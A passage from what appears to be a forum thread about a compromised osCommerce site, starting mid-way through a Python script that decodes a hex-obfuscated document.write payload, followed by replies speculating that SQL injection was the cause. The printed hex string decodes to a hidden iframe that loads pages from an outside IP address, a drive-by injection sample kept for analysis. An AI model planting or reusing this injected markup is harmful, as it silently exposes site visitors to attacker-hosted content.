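    "696672616D65206E616D653D6266623565207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F"
    "2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323430383030"
    "292B27306661305C272077696474683D343330206865696768743D353630207374796C653D5C27646973706C6179"
    "3A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E"
    "'));</script>"
)

# document.write(<decoder>('<hex>')): capture the hex argument.
DOCWRITE_ARG_RE = re.compile(r"document\.write\(\s*\w+\(\s*'([0-9A-Fa-f]+)'\s*\)\s*\)")

# src of any iframe in the decoded HTML; the optional backslash allows for the
# JS-escaped quote (src=\'...) that document.write'd markup carries.
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*\\?['\"]([^'\"\\]+)", re.IGNORECASE)


def decode_hex_pairs(hexstr: str) -> str:
    """Mirror of the obfuscated v48120f3d21ca7(): each pair of hex digits is one character."""
    if len(hexstr) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", hexstr):
        raise ValueError("payload is not an even-length hex string")
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def defang(url: str) -> str:
    """Make an indicator safe to paste into a ticket or report."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def analyse(script_text: str) -> list:
    """Decode every hex payload passed to document.write() and list the iframe sources in it."""
    findings = []
    for hexstr in DOCWRITE_ARG_RE.findall(script_text):
        decoded = decode_hex_pairs(hexstr)
        findings.append({
            "decoded": decoded,
            "iframe_sources": [defang(s) for s in IFRAME_SRC_RE.findall(decoded)],
        })
    return findings


if __name__ == "__main__":
    for finding in analyse(INJECTED_SCRIPT):
        print(finding["decoded"])
        print("iframe sources:", finding["iframe_sources"])
```

The decoded markup is a second, display:none iframe whose src is the 77.221.133.150 address quoted above, with a random number appended to defeat caching; the outer iframe pointing at http://url is the part the hosting support team had already spotted. The decoder works on any page that uses the same two-hex-digits-per-character trick, not just this sample.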

The problem is not your server security but osCommerce, I guess.
The issue with these free scripts or massively used scripts is that too many people know too much about them, and hackers know their flaws more quickly than the vendor.

Most probably the file was uploaded through your script into a directory which has write permission, using SQL injection, I guess.

I am sure they must have done much more than just editing the iframe.

It happened to us long ago when a guy uploaded a lot of scary stuff to our site and he was using that to send emails.

Fortunately for me they were not able to take over the whole system due to some security measures, I GUESS, but surely they had SQL access; it can be limited, as they were able to do just a few minor things.

The only remedy: switch from osCommerce, spend $100-150 and buy some decent script.

Yes, you are right :-)

However, the issue was over a long time ago.